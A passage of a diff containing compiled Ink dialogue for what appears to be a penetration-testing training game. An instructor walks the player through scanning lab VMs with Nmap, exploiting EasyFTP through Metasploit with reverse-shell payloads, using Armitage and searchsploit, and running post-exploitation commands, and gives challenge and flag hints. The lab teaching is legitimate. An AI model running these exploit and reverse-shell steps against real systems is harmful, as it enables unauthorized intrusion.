back","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-2":["\n",[["ev",{"^->":"commands_reference.0.c-2.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Searching for Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-2.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > help search","\n","^msf > search easyftp","\n","^msf > search type:exploit platform:Windows","\n","^msf > search type:exploit cve:2003-0352","\n","^msf > search buffer overflow","\n","^msf > search type:exploit platform:linux","\n","^msf > info exploit/windows/ftp/easyftp_cwd_fixret","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-3":["\n",[["ev",{"^->":"commands_reference.0.c-3.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Launching Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-3.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use exploit/windows/ftp/easyftp_cwd_fixret","\n","^msf exploit(...) > show options","\n","^msf exploit(...) > set RHOST TARGET_IP","\n","^msf exploit(...) > show payloads","\n","^msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp","\n","^msf exploit(...) > set LHOST YOUR_KALI_IP","\n","^msf exploit(...) > check (if supported)","\n","^msf exploit(...) > exploit","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-4":["\n",[["ev",{"^->":"commands_reference.0.c-4.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Post-Exploitation Commands (Windows):**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-4.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Post-Exploitation Commands (Linux):**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-4.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check privileges)","\n","^type C:pathtoflag.txt (read file)","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-4.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^ls -la (list files)","\n","^cat /etc/passwd (view user accounts)","\n","^whoami (current user)","\n","^cat flag (read flag file)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-5":["\n",[["ev",{"^->":"commands_reference.0.c-5.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Armitage Setup:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-5.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Armitage Workflow:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-5.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^armitage &","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-5.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^1. Hosts → Nmap Scan → Quick Scan (OS detect)","\n","^2. Armitage → Set Exploit Rank → Poor","\n","^3. Attacks → Find attacks","\n","^4. Right-click host → Attack → select exploit → Launch","\n","^5. Right-click compromised host → Interact → Command shell","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-6":["\n",[["ev",{"^->":"commands_reference.0.c-6.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Exploit Database:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-6.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^less /usr/share/exploitdb/files_exploits.csv","\n","^grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^searchsploit easyftp","\n","^searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"g-0":[{"->":"exploitation_hub"},null]}],null],"challenge_tips":[["^Let me give you practical tips for succeeding in the exploitation challenges.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"challenge_tips.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Finding Vulnerable Services:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"challenge_tips.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET","\n","^Pay close attention to service versions - specific version numbers are key to finding exploits.","\n","^Import results into Metasploit for easier targeting: db_nmap -sV TARGET","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Tips for exploiting the Windows server?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Tips for exploiting the Linux server?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Tips for using Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^General troubleshooting advice?","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Where are the flags?","/str","/ev",{"*":".^.c-4","flg":4},{"c-0":["\n","^The Windows server is running EasyFTP with a known vulnerability.","\n","^Search for it: search easyftp","\n","^Look for the module ending in \"cwd_fixret\"","\n","^Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp","\n","^Make sure to set LHOST to YOUR Kali IP (the host-only network address).","\n","^If the exploit fails, restart the Windows VM and try again.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The Linux server has multiple potentially vulnerable services.","\n","^Scan all ports to find everything running: nmap -sV -p- TARGET","\n","^Look for services like vsftpd, IRC, or other network services.","\n","^Search Metasploit for exploits matching those services.","\n","^Remember to use a Unix reverse shell payload: cmd/unix/reverse","\n","^Some Linux exploits are more reliable than others - you may need to try a few.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage is great for beginners because it suggests attacks automatically.","\n","^Make sure you set the exploit rank to \"Poor\" or you'll miss some exploits.","\n","^Don't just click the first suggested attack - read the module info to understand what it does.","\n","^Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1.","\n","^If Armitage seems to hang, check the console tab at the bottom for error messages.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Always verify your IP addresses with \"show options\" before running exploits.","\n","^RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP.","\n","^If services stop responding, restart the target VM - exploits often crash vulnerable services.","\n","^After successfully exploiting a service once, you'll need to restart the VM to exploit it again.","\n","^Be patient - some exploits take time to establish connections.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-4":["\n","^For the Windows server, look on a user's Desktop.","\n","^Navigate with: cd C:Users or cd C:Documents and Settings","\n","^List directories with: dir","\n","^Read flag files with: type flag.txt","\n","^For the Linux server, flags are typically in user home directories.","\n","^Navigate with: cd /home","\n","^List directories with: ls -la","\n","^Read flags with: cat flag","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"ready_for_practice":[["^Excellent! You're ready to start practical exploitation.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^You now understand how to move from scanning to exploitation - the core of penetration testing.","\n","^Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes.","\n","^In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access.","\n","ev","str","^Any final advice before I start?","/str","/ev",{"*":".^.c-0","flg":4},{"c-0":["\n","^Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit.","\n","^Don't rush. Take time to understand what each exploit does and why it works.","\n","^If something doesn't work, check your settings, restart the target, and try again.","\n","^Try both msfconsole and Armitage to see which you prefer.","\n","^Most importantly: always verify you're targeting the right system and have authorization!","\n","^Good luck, Agent ","ev",{"VAR?":"player_name"},"out","/ev","^. Time to put your skills to the test.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},{"->":"exploitation_hub"},null]}],null],"global decl":["ev",0,{"VAR=":"instructor_rapport"},0,{"VAR=":"exploitation_mastery"},"str","^Agent 0x00","/str",{"VAR=":"player_name"},"/ev","end",null]}],"listDefs":{}}
\ No newline at end of file
+{"inkVersion":21,"root":[[["done",{"#n":"g-0"}],null],"done",{"start":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome back, ","ev",{"VAR?":"player_name"},"out","/ev","^. What would you like to discuss?","\n",{"->":"exploitation_hub"},null],"intro_timed":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome to From Scanning to Exploitation, ","ev",{"VAR?":"player_name"},"out","/ev","^. I'm your exploitation specialist instructor for this session.","\n","^This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.","\n","^We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process.","\n","^Remember: this knowledge is for authorized penetration testing and defensive security only.","\n","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^Let me explain how this lab works. You'll find three key resources here:","\n","^First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.","\n","^Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows server, and a Linux server for hands-on exploitation practice.","\n","^Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.","\n","^You can talk to me anytime to explore exploitation concepts, get tips, or ask questions about the material. I'm here to help guide your learning.","\n","^Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.","\n",{"->":"exploitation_hub"},null],"exploitation_hub":[["^What aspect of exploitation would you like to explore?","\n","ev","str","^Why combine scanning and exploitation?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Scanning targets with Nmap","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Metasploit database and scan import","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Running scans from within msfconsole","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Searching for Metasploit exploits","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Launching Metasploit exploits","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Introduction to Armitage","/str","/ev",{"*":".^.c-6","flg":4},"ev","str","^Using Armitage for automated hacking","/str","/ev",{"*":".^.c-7","flg":4},"ev","str","^Vulnerability databases and research","/str","/ev",{"*":".^.c-8","flg":4},"ev","str","^The Exploit Database and searchsploit","/str","/ev",{"*":".^.c-9","flg":4},"ev","str","^Show me the commands reference","/str","/ev",{"*":".^.c-10","flg":4},"ev","str","^Practical challenge tips","/str","/ev",{"*":".^.c-11","flg":4},"ev","str","^I'm ready for the lab exercises","/str","/ev",{"*":".^.c-12","flg":4},"ev","str","^That's all for now","/str","/ev",{"*":".^.c-13","flg":4},{"c-0":["\n",{"->":"scanning_to_exploitation"},null],"c-1":["\n",{"->":"nmap_scanning"},null],"c-2":["\n",{"->":"metasploit_database"},null],"c-3":["\n",{"->":"msfconsole_scanning"},null],"c-4":["\n",{"->":"searching_exploits"},null],"c-5":["\n",{"->":"launching_exploits"},null],"c-6":["\n",{"->":"armitage_intro"},null],"c-7":["\n",{"->":"armitage_usage"},null],"c-8":["\n",{"->":"vulnerability_databases"},null],"c-9":["\n",{"->":"exploit_db"},null],"c-10":["\n",{"->":"commands_reference"},null],"c-11":["\n",{"->":"challenge_tips"},null],"c-12":["\n",{"->":"ready_for_practice"},null],"c-13":["\n","#","^exit_conversation","/#",{"->":".^.^.^"},null]}],null],"scanning_to_exploitation":[["^After gathering information about a target through footprinting and scanning, you need to know what attacks will work.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security?","\n","^Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information.","\n","ev","str","^What makes a target exploitable?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I know what attacks will work?","/str","/ev",{"*":".^.c-1","flg":4},{"c-0":["\n","^A target is exploitable when it's running vulnerable software that you have an exploit for.","\n","^For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system.","\n","^The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^This is where vulnerability databases and exploit frameworks like Metasploit come in.","\n","^After scanning reveals \"Windows 2000 with EasyFTP 1.7.0.11,\" you can search for known vulnerabilities in those specific versions.","\n","^Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number.","\n","^We'll also look at external databases like CVE Details, NVD, and Exploit DB.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"nmap_scanning":[["^The first step is thorough scanning to identify your targets and what they're running.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows.","\n","^A comprehensive scan would be: nmap -sV 10.X.X.2-3","\n","^Where X.X are the second and third octets of your Kali VM's IP address.","\n","ev","str","^What should I look for in the scan results?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What if the scan takes too long?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if nmap shows ftp with a question mark?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Pay attention to several key pieces of information:","\n","^First, the IP addresses - which host is Linux and which is Windows?","\n","^Second, what services are running - HTTP, FTP, SSH, IRC?","\n","^Third, and most importantly, what specific software versions are running. For example: \"vsftpd 2.3.4\" or \"EasyFTP 1.7.0.11\"","\n","^Those specific version numbers are critical for finding applicable exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Windows scans can take several minutes to complete - this is normal.","\n","^If you want faster results, you can skip OS detection or scan fewer ports.","\n","^However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^If you see \"ftp?\" in the results, it means Nmap isn't confident about the service identification.","\n","^This can happen if the service is slow to respond or behaving unusually.","\n","^Try restarting the Windows server and scanning again. The service should respond properly after a fresh start.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"metasploit_database":[["^Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services.","\n","^Before using the database, you need to initialize it and start PostgreSQL.","\n","ev","str","^How do I initialize the Metasploit database?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I import Nmap scan results?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What can I do with the database?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^First, reinitialize the database: sudo msfdb reinit","\n","^Then start PostgreSQL: sudo service postgresql start","\n","^These commands set up the database that Metasploit will use to store scan results and track compromised hosts.","\n","^You only need to do this once per session, or after restarting your Kali VM.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^If you've saved Nmap results in XML format, you can import them:","\n","^From msfconsole, run: db_import scan_output.xml","\n","^Metasploit will parse the XML and populate the database with host and service information.","\n","^You can then query this data with commands like \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Once data is in the database, you can query it intelligently:","\n","^\"hosts\" shows all discovered hosts and their operating systems.","\n","^\"services\" shows all discovered services across all hosts.","\n","^\"services -p 21\" shows only services on port 21 (FTP).","\n","^\"services -p 21 -R\" does the same AND automatically sets RHOSTS to target those services!","\n","^This integration makes targeting much more efficient.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"msfconsole_scanning":[["^You can run scans directly from within msfconsole - you don't always need a separate terminal.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET","\n","^Even better, you can use db_nmap which scans AND automatically imports results into the database.","\n","ev","str","^What's the difference between nmap and db_nmap?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Does Metasploit have its own scanners?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I use Metasploit's port scanner?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^When you run \"nmap\" from msfconsole, it just executes Nmap normally. You'd need to manually import the results.","\n","^When you run \"db_nmap\", it does the same scan BUT automatically imports results into the Metasploit database.","\n","^For example: msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^This scans all ports with OS and version detection, and the results are immediately available via \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap.","\n","^You can see them with: use auxiliary/scanner/portscan/ (then press TAB)","\n","^For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp","\n","^These modules integrate directly with the database and can use multiple threads for faster scanning.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, select the module: use auxiliary/scanner/portscan/tcp","\n","^Set the target: set RHOSTS TARGET_IP","\n","^Optionally speed it up: set THREADS 10","\n","^Then run it: run","\n","^Results are automatically stored in the database. You can verify with the \"services\" command.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"searching_exploits":[["^Metasploit's search command is incredibly powerful for finding relevant exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^You can search by platform, service name, CVE number, exploit type, and more.","\n","^The basic syntax is: search <keyword>","\n","^But you can be much more specific with search operators.","\n","ev","str","^What search operators are available?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I search for specific software?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Give me some search examples","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the main search operators:","\n","^type: - Specify module type (exploit, auxiliary, post)","\n","^platform: - Specify platform (Windows, Linux, etc.)","\n","^cve: - Search by CVE number","\n","^name: - Search module names","\n","^For example: search type:exploit platform:Windows","\n","^Or: search type:exploit cve:2003-0352","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Simply include the software name in the search:","\n","^search easyftp","\n","^search vsftpd","\n","^search unreal","\n","^Metasploit will search module names, descriptions, and references for matches.","\n","^Look through the results for modules that match your target's version number.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Sure! Here are useful searches:","\n","^search type:exploit platform:linux","\n","^search type:exploit cve:2018","\n","^search buffer overflow","\n","^search type:exploit platform:Windows XP","\n","^search IRC (to find IRC server exploits)","\n","^Once you find a promising module, use \"info exploit/path/to/module\" to learn more about it.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"launching_exploits":[["^Once you've identified the right exploit module, launching it follows a standard workflow.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The process is: select the module, configure options, choose a payload, and launch the attack.","\n","^Let's walk through a typical exploitation scenario.","\n","ev","str","^Walk me through exploiting EasyFTP","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What payloads should I use?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if the exploit doesn't work?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^What can I do once I have a shell?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Let me guide you through the complete process:","\n","^First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret","\n","^Check required options: show options","\n","^Set the target: set RHOST TARGET_IP","\n","^Choose a payload: set PAYLOAD windows/shell/reverse_tcp","\n","^Set your IP for the reverse shell: set LHOST YOUR_KALI_IP","\n","^Optionally check if it's vulnerable: check (though most don't support this)","\n","^Launch the attack: exploit","\n","^If successful, you'll get a shell on the target!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The payload depends on what you want to achieve and what the exploit supports.","\n","^You can see compatible payloads with: show payloads","\n","^For Windows targets, common choices include:","\n","^windows/shell/reverse_tcp - Basic command shell","\n","^windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features","\n","^For Linux targets:","\n","^cmd/unix/reverse - Simple Unix shell","\n","^linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, run \"show options\" and verify all settings, especially IP addresses.","\n","^Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST.","\n","^Try restarting the target VM - sometimes services crash after failed exploit attempts.","\n","^Verify the target is actually running the vulnerable software at that version.","\n","^Some exploits are unreliable and may need multiple attempts.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^With a Windows shell, you can run commands like:","\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check your privileges)","\n","^For Linux shells:","\n","^ls -la (list files)","\n","^cat /etc/passwd (view user accounts)","\n","^whoami (check current user)","\n","^We'll cover post-exploitation in more depth in later labs.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_intro":[["^Armitage is a free and open source graphical interface for Metasploit with powerful automation features.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing.","\n","^Armitage can scan networks, automatically suggest attacks, and visualize compromised systems.","\n","ev","str","^How is Armitage different from msfconsole?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I start Armitage?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What does the Armitage interface show?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Msfconsole is a command-line interface that gives you complete control and flexibility.","\n","^Armitage provides a graphical interface that visualizes the network and automates finding attacks.","\n","^Armitage can look at scan results and automatically suggest which exploits might work against each target.","\n","^It's particularly useful for beginners or when you want to quickly test multiple targets.","\n","^However, experienced penetration testers often prefer msfconsole for its power and speed.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^First, initialize the Metasploit database if you haven't already:","\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^Then start Armitage: armitage &","\n","^The & runs it in the background so you can continue using your terminal.","\n","^Leave the connection options as default and click \"Connect\"","\n","^If prompted, allow Armitage to start the Metasploit RPC server.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage displays a visual network map showing discovered hosts.","\n","^Each host is represented by an icon - the icon shows the detected operating system.","\n","^Compromised systems are shown in red with lightning bolts.","\n","^You can right-click hosts to see suggested attacks, launch exploits, or interact with shells.","\n","^The interface makes it easy to see the big picture of a network and what you've compromised.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_usage":[["^Let me walk you through using Armitage to scan and exploit targets.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow.","\n","ev","str","^How do I scan with Armitage?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How does Armitage suggest attacks?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I launch an attack in Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I interact with a compromised system?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Click the \"Hosts\" menu, select \"Nmap Scan\", then choose a scan type.","\n","^\"Quick Scan (OS detect)\" is a good starting point: nmap -O -sV TARGET","\n","^Enter the IP address to scan and Armitage will run Nmap.","\n","^Results are automatically imported into the Metasploit database and displayed 